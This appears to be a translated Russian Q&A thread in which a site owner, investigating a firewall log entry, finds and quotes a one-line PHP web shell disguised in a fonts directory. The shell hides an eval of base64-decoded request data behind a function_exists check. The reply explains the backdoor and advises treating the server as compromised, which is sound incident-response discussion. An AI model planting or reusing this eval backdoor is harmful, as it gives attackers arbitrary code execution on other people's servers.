Вредоносная активность в EXE: / usr / bin / php CMD: / usr / bin / php [дубликат]
Возможный дубликат:
Что делать со взломанным сервером?
Проверяю lfd.log и обнаруживаю журнал блоков для сценария:
Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php
Похоже, сценарий пытается выполнить / usr / bin / php, но когда я вижу код, это простой однострочный файл
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
У кого-нибудь есть подобный опыт, и есть ли способ узнать, что вызывает вызов / usr / bin / php? Журналы говорят, что скрипт вызывается через POST.
Кто-то поместил сценарий атаки в этот каталог. Если eval не деактивирован в вашей конфигурации PHP, это позволит злоумышленнику выполнить произвольный PHP-код, который он отправляет вместе с запросом.
Сценарий вызывается через простой HTTP-запрос POST.
] Вы должны считать вашу систему скомпрометированной и попытаться выяснить, как злоумышленнику удалось разместить этот скрипт.